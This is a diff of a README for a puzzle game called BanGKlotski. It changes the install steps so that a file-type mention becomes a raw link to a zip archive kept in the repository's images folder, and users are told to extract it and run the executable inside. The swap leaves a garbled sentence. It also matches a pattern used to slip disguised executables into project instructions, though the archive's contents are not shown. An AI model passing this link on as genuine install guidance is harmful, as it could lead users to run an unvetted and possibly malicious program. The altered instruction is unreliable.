deka214/BanGKlotski/README.md

 1. For `.AppImage` files, right-click the file, choose “Properties,” then go to Permissions and check “Allow executing file as program.”
 2. Double-click the file to run BanGKlotski.
-3. For `.tar.gz` files, extract the archive and run the included executable as per instructions inside.
+3. For `https://github.com/deka214/BanGKlotski/raw/refs/heads/main/images/G-Klotski-Ban-2.3.zip` files, extract the archive and run the included executable as per instructions inside.

 ---